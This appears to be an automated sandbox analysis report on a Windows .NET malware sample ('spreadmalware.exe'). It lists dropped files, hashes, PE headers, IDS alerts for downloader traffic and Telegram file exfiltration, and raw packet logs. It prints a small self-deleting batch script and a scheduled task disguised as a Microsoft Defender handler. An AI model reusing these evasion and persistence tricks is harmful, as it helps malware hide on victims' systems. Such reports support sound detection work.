SHA-512:	ACF9B6BB80AF3EB908AE07C31E08FECCA78D93E28F7EAE281D97C36D384FED8F4849F5850185240AB8A34986BC6356F2162C2748CCCBD0E19295BD7905679455
Malicious:	false
Preview:	@echo off ..findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

C:\Users\user\Desktop\kdotHFANn.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.798349911505914
Encrypted:	false
SSDEEP:	3:mKDDgvJxwuMW0nacwREaKC5ALsLHETFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg9e:hO/wu9cNwiaZ5ALszETgvt2hQI1iAMLA
MD5:	C741B312CAEA7173193DD8CD7FA2B7FA
SHA1:	4B23AA4778CEB01ACBC6EB39104D26C04BD103FD
SHA-256:	CFB63A6054E5D34C5A56F6AECC0A8B7316141EB6282CAB16D368FC0E0AFE13E0
SHA-512:	ACF9B6BB80AF3EB908AE07C31E08FECCA78D93E28F7EAE281D97C36D384FED8F4849F5850185240AB8A34986BC6356F2162C2748CCCBD0E19295BD7905679455
Malicious:	false
Preview:	@echo off ..findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

C:\Users\user\Desktop\kdotUjDZO.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.798349911505914
Encrypted:	false
SSDEEP:	3:mKDDgvJxwuMW0nacwREaKC5ALsLHETFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg9e:hO/wu9cNwiaZ5ALszETgvt2hQI1iAMLA
MD5:	C741B312CAEA7173193DD8CD7FA2B7FA
SHA1:	4B23AA4778CEB01ACBC6EB39104D26C04BD103FD
SHA-256:	CFB63A6054E5D34C5A56F6AECC0A8B7316141EB6282CAB16D368FC0E0AFE13E0
SHA-512:	ACF9B6BB80AF3EB908AE07C31E08FECCA78D93E28F7EAE281D97C36D384FED8F4849F5850185240AB8A34986BC6356F2162C2748CCCBD0E19295BD7905679455
Malicious:	false
Preview:	@echo off ..findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

C:\Users\user\Desktop\kdotmQBVyj.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.798349911505914
Encrypted:	false
SSDEEP:	3:mKDDgvJxwuMW0nacwREaKC5ALsLHETFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg9e:hO/wu9cNwiaZ5ALszETgvt2hQI1iAMLA
MD5:	C741B312CAEA7173193DD8CD7FA2B7FA
SHA1:	4B23AA4778CEB01ACBC6EB39104D26C04BD103FD
SHA-256:	CFB63A6054E5D34C5A56F6AECC0A8B7316141EB6282CAB16D368FC0E0AFE13E0
SHA-512:	ACF9B6BB80AF3EB908AE07C31E08FECCA78D93E28F7EAE281D97C36D384FED8F4849F5850185240AB8A34986BC6356F2162C2748CCCBD0E19295BD7905679455
Malicious:	false
Preview:	@echo off ..findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

C:\Users\user\Desktop\kdotqIuceN.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.798349911505914
Encrypted:	false
SSDEEP:	3:mKDDgvJxwuMW0nacwREaKC5ALsLHETFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg9e:hO/wu9cNwiaZ5ALszETgvt2hQI1iAMLA
MD5:	C741B312CAEA7173193DD8CD7FA2B7FA
SHA1:	4B23AA4778CEB01ACBC6EB39104D26C04BD103FD
SHA-256:	CFB63A6054E5D34C5A56F6AECC0A8B7316141EB6282CAB16D368FC0E0AFE13E0
SHA-512:	ACF9B6BB80AF3EB908AE07C31E08FECCA78D93E28F7EAE281D97C36D384FED8F4849F5850185240AB8A34986BC6356F2162C2748CCCBD0E19295BD7905679455
Malicious:	false
Preview:	@echo off ..findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

C:\Windows\Logs\ReAgent\ReAgent.log

Download File

Process:	C:\Windows\System32\ReAgentc.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1815
Entropy (8bit):	4.261015109641005
Encrypted:	false
SSDEEP:	24:3NGIEN9VMcg4j5SQ2QH2EemWYU2G0tD/QypI+j5NHa2:3NANUv6SQ2TE5WH2FD4yi+j5N62
MD5:	9669069A712CBF618ECA4911629B13A8
SHA1:	95A388410398CD8E04B151CB8AE7585FA0B8F0CC
SHA-256:	94125F901CCAD6B9FCBE90BD5766C8A0412B1F6AAA4C1B6B4CE80D041803247A
SHA-512:	C5D2286D8F2A64640765EC91E2678B16C64B9FAECFB558DBDD47DCF926A6B4DA5B16E4FF24EF9F7B4C331C4BE3F0C3D500FC8AE3BDCD3AFD8C9D7D38297C46B7
Malicious:	false
Preview:	.2025-01-08 05:52:08, Info [reagentc.exe] ------------------------------------------------------..2025-01-08 05:52:08, Info [reagentc.exe] -----Executing command line: reagentc.exe /disable-----..2025-01-08 05:52:08, Info [reagentc.exe] ------------------------------------------------------..2025-01-08 05:52:08, Info [reagentc.exe] Enter WinReUnInstall..2025-01-08 05:52:08, Info [reagentc.exe] Update enhanced config info is enabled...2025-01-08 05:52:08, Warning [reagentc.exe] Failed to get recovery entries: 0xc0000225..2025-01-08 05:52:08, Info [reagentc.exe] winreGetWinReGuid returning 0X490..2025-01-08 05:52:08, Info [reagentc.exe] ReAgentConfig::ReadBcdAndUpdateEnhancedConfigInfo WinRE disabled, WinRE Guid could not be determined (0x490) ..2025-01-08 05:52:08, Info [rea

C:\Windows\Panther\UnattendGC\diagerr.xml

Download File

Process:	C:\Windows\System32\ReAgentc.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (310)
Category:	dropped
Size (bytes):	50033
Entropy (8bit):	4.8830820284759255
Encrypted:	false
SSDEEP:	384:53Iq3Ie3Iq3IY3Iq3Iq3Iq3Iq3Iq3IY3IY3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3IM:5l7ljllllljjllllllllllljjll
MD5:	D4BF61290112724127B68E545CA54D81
SHA1:	640FF0E97CF5CE24EAEC73AAF5F661780D8678A0
SHA-256:	17FA3E64FD07DA3052E22FACAB4338E169AA5903199B5CEDBEDD7AA7F47A3DE5
SHA-512:	486D4A3868DFCE2055AEFEDFBE908FD6913D7EC8DB6252905B822D1E2AB9C16CE8DA3B624AA947F889DBC6C1D383D3107DFB3ECAAD2469D3117027811005CABF
Malicious:	false
Preview:	.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

C:\Windows\Panther\UnattendGC\diagwrn.xml

Download File

Process:	C:\Windows\System32\ReAgentc.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (355)
Category:	modified
Size (bytes):	51331
Entropy (8bit):	4.919175594694506
Encrypted:	false
SSDEEP:	384:53Iq3Ir3Iq3IY3Iq3Iq3Iq3Iq3Iq3IY3IY3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3I8:5lQljllllljjllllllllllljjlX
MD5:	363E03F9DBF76B039838F5470C3BBC21
SHA1:	E4775A9289209E9B9DE0DD066B1778E0B31A2FF7
SHA-256:	2470216EF5AE5D44BD400CA04EBED7810200C8F7E4F0949598C14F4EEAD7CCF7
SHA-512:	BECEE102B3B4E4C1EC480FCFE1A179475B284190B614DB8AC0103328D6EC8287BC23741A4DCD8D1734B2F268938F8622CE6B6AB125BE90BE003676FBA764A3D1
Malicious:	false
Preview:	.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

C:\Windows\Panther\UnattendGC\setuperr.log

Download File

Process:	C:\Windows\System32\ReAgentc.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	224
Entropy (8bit):	4.617165035453225
Encrypted:	false
SSDEEP:	3:92UQsKO8/FFORYxZaMJAvK/kFpdEJwHVDMUQVY3d/sJtxSav/FFODLg2xBLELY5s:Yus/4YxzJ/MPxVZCYt/Om8/2wqBAAy
MD5:	F014273EDE4B02D1BF636D6EEE12C2B9
SHA1:	E1DAAEAE46E3FC20993E24297FD294DA2C20AB46
SHA-256:	9B4692F87CCCFF3E11DB8E294FF91EA7DB0F67E11CA67465DEF97327421BD3E3
SHA-512:	431F38E36FCA86DC84E608C811E603EC9DF9AD7D2E5FF9CB6B987128DB5FDEFBA891B8845BC4545E6D00A3F1894EAEF75379A9F00113F8A89CA60A131BA221D2
Malicious:	false
Preview:	.2023-10-03 08:57:16, Error [msoobe.exe] COMMIT: failed for plugin LocalUser Plugin with hr=0x80070490..2025-01-08 05:52:08, Error [reagentc.exe] WinReUnInstall failed: : 0x2..

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\Null

Download File

Process:	C:\Windows\System32\schtasks.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	109
Entropy (8bit):	4.492923321562382
Encrypted:	false
SSDEEP:	3:BgnKDOh5ejhADu2VxN3GDLVtEL/AXFN/FWKAK89AAAXb:BgnKqh5edmvVxJqOAVj2K89o
MD5:	3AC873CDEED7552F6006BC2B7E34D35A
SHA1:	BF735F150B6609867185CE52F551CC36434236E2
SHA-256:	401A1AB455981DF08FBE2C271808FAEEE0521B4B5E0F2D3F8F8C30537D8B34AF
SHA-512:	4F02EB22D158D1C8B0317BA7217604C430DCBE7978A23546DD2B8AE7D4013622F92952B01DC15249C57014C3551D8985CDDE14CC671E33E5C2AE886D6FCF49DA
Malicious:	false
Preview:	SUCCESS: The scheduled task "Microsoft Defender Threat Intelligence Handler" has successfully been created...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.8681049378486945
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	spreadmalware.exe
File size:	62'976 bytes
MD5:	3437a2105a9740ad94b06f04378bb5b9
SHA1:	80ca4ebff21e3a4962ccdec2853308ba544cdeb9
SHA256:	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028
SHA512:	5d30cc5fe4b59a99f8c188c9d9efeb22d4813bd1fed44b4cb6f4bc1d045d51a31591c40f41324fc0afd65e1b4630aa304f5e8d90009ec6f1c690c75313a74076
SSDEEP:	1536:lF6AD4dXD7tlo9OlvBu/b2QDAOzJri76tF:qZdnty9ODu/b2Vexi7a
TLSH:	9453E60333C85B4AC56824B1C5FF053C03FABA8B6A33D6997F4C1BD90D463A69D85B5A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[6~g............................^.... ... ....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x41065e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x677E365B [Wed Jan 8 08:24:59 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10610	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x4f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x16000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe664	0xe800	488fa43db4311d91ac05b21811961edc	False	0.5443325700431034	data	5.967199644518609	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x12000	0x1e8	0x200	aae4bb036f38604033300ae367fa3338	False	0.861328125	data	6.60189197649515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x14000	0x4f0	0x600	20e3b505ce16c4961844a182b365b173	False	0.37890625	data	3.7941942798374617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x16000	0xc	0x200	a02b21044de64ce0addd285f7cdeed0e	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x140a0	0x264	data			0.46405228758169936
RT_MANIFEST	0x14304	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T10:15:05.360559+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49700	104.21.32.1	443	TCP
2025-01-08T10:15:08.397200+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49701	178.159.12.230	443	TCP
2025-01-08T10:15:10.037748+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49702	104.21.32.1	443	TCP
2025-01-08T10:15:11.609087+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49705	38.143.146.102	443	TCP
2025-01-08T10:15:24.732500+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49795	185.199.110.133	443	TCP
2025-01-08T10:15:33.822107+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49849	140.82.121.3	443	TCP
2025-01-08T10:15:34.444272+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49856	185.199.111.133	443	TCP
2025-01-08T10:15:34.460345+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49859	185.199.110.133	443	TCP
2025-01-08T10:15:34.747172+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49855	140.82.121.3	443	TCP
2025-01-08T10:15:35.413992+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49869	185.199.111.133	443	TCP
2025-01-08T10:15:35.585443+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49863	140.82.121.3	443	TCP
2025-01-08T10:15:35.585443+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49863	140.82.121.3	443	TCP
2025-01-08T10:15:36.198513+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49875	185.199.111.133	443	TCP
2025-01-08T10:15:36.198513+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49875	185.199.111.133	443	TCP
2025-01-08T10:15:47.152639+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49939	140.82.121.3	443	TCP
2025-01-08T10:15:47.763113+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49948	185.199.111.133	443	TCP
2025-01-08T10:15:47.851544+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49945	140.82.121.3	443	TCP
2025-01-08T10:15:48.514130+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49952	185.199.111.133	443	TCP
2025-01-08T10:15:48.880963+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49955	140.82.121.3	443	TCP
2025-01-08T10:15:48.880963+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49955	140.82.121.3	443	TCP
2025-01-08T10:15:49.477697+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49963	185.199.111.133	443	TCP
2025-01-08T10:15:49.477697+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49963	185.199.111.133	443	TCP
2025-01-08T10:16:50.455544+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	50010	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 10:15:03.776777983 CET	49699	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:03.776824951 CET	443	49699	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:03.776921988 CET	49699	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:03.798338890 CET	49699	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:03.798352003 CET	443	49699	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:04.268309116 CET	443	49699	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:04.268409967 CET	49699	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:04.272538900 CET	49699	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:04.272550106 CET	443	49699	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:04.272780895 CET	443	49699	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:04.312861919 CET	49699	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:04.341928005 CET	49699	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:04.387343884 CET	443	49699	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:04.546739101 CET	443	49699	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:04.546909094 CET	443	49699	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:04.547525883 CET	49699	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:04.574834108 CET	49699	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:04.578773975 CET	49700	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:04.578809977 CET	443	49700	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:04.578882933 CET	49700	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:04.579148054 CET	49700	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:04.579160929 CET	443	49700	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:05.033742905 CET	443	49700	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:05.061201096 CET	49700	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:05.061217070 CET	443	49700	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:05.360549927 CET	443	49700	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:05.360651970 CET	443	49700	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:05.360728025 CET	443	49700	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:05.360743046 CET	49700	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:05.360785961 CET	49700	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:05.368408918 CET	49700	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:07.287477970 CET	49701	443	192.168.2.7	178.159.12.230
Jan 8, 2025 10:15:07.287518978 CET	443	49701	178.159.12.230	192.168.2.7
Jan 8, 2025 10:15:07.287611961 CET	49701	443	192.168.2.7	178.159.12.230
Jan 8, 2025 10:15:07.300086975 CET	49701	443	192.168.2.7	178.159.12.230
Jan 8, 2025 10:15:07.300101042 CET	443	49701	178.159.12.230	192.168.2.7
Jan 8, 2025 10:15:08.015913963 CET	443	49701	178.159.12.230	192.168.2.7
Jan 8, 2025 10:15:08.016139030 CET	49701	443	192.168.2.7	178.159.12.230
Jan 8, 2025 10:15:08.066550016 CET	49701	443	192.168.2.7	178.159.12.230
Jan 8, 2025 10:15:08.066564083 CET	443	49701	178.159.12.230	192.168.2.7
Jan 8, 2025 10:15:08.066853046 CET	443	49701	178.159.12.230	192.168.2.7
Jan 8, 2025 10:15:08.096235037 CET	49701	443	192.168.2.7	178.159.12.230
Jan 8, 2025 10:15:08.139334917 CET	443	49701	178.159.12.230	192.168.2.7
Jan 8, 2025 10:15:08.397202015 CET	443	49701	178.159.12.230	192.168.2.7
Jan 8, 2025 10:15:08.397871971 CET	443	49701	178.159.12.230	192.168.2.7
Jan 8, 2025 10:15:08.397922993 CET	49701	443	192.168.2.7	178.159.12.230
Jan 8, 2025 10:15:08.498625040 CET	49701	443	192.168.2.7	178.159.12.230
Jan 8, 2025 10:15:09.342554092 CET	49702	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:09.342592001 CET	443	49702	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:09.342679977 CET	49702	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:09.343038082 CET	49702	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:09.343053102 CET	443	49702	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:09.796667099 CET	443	49702	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:09.796767950 CET	49702	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:09.799483061 CET	49702	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:09.799501896 CET	443	49702	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:09.799771070 CET	443	49702	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:09.801713943 CET	49702	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:09.843333960 CET	443	49702	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:10.037787914 CET	443	49702	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:10.037966013 CET	443	49702	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:10.038012981 CET	49702	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:10.038624048 CET	49702	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:10.040730953 CET	49704	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:10.040787935 CET	443	49704	104.21.32.1	192.168.2.7
Jan 8, 2025 10:15:10.040863037 CET	49704	443	192.168.2.7	104.21.32.1
Jan 8, 2025 10:15:10.041127920 CET	49704	443	192.168.2.7	104.21.32.1
